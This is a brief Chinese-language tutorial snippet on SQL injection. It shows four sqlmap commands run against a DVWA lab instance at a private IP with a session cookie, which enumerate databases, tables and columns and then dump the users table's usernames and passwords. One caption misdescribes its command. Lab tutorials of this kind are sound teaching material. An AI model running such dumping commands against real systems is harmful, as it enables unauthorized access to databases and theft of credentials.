sql注入linux
时间: 2023-11-07 14:03:57 浏览: 92
SQL注入
sql注入是一种攻击技术,它利用了应用程序对用户输入数据的处理不当,从而执行恶意的SQL查询。在Linux环境下,使用工具如sqlmap可以用来检测和利用SQL注入漏洞。
对于枚举指定数据库,可以使用以下命令:
sqlmap -u “192.168.116.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=" security=low; PHPSESSID =d83b8c58a07ff994eb5c0ba6a20283a5" -D dvwa --tables
对于枚举表中指定表中用户名和密码,可以使用以下命令:
sqlmap -u “192.168.116.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=" security=low; PHPSESSID =d83b8c58a07ff994eb5c0ba6a20283a5" -D dvwa -T users --columns
要枚举DBMS中的数据库,可以使用以下命令:
sqlmap -u “192.168.116.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=" security=low; PHPSESSID =d83b8c58a07ff994eb5c0ba6a20283a5" --dbs
要提取所有用户名和密码,可以使用以下命令:
sqlmap -u “192.168.116.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=" security=low; PHPSESSID =d83b8c58a07ff994eb5c0ba6a20283a5" -D dvwa -T users -C user,password --dump
阅读全文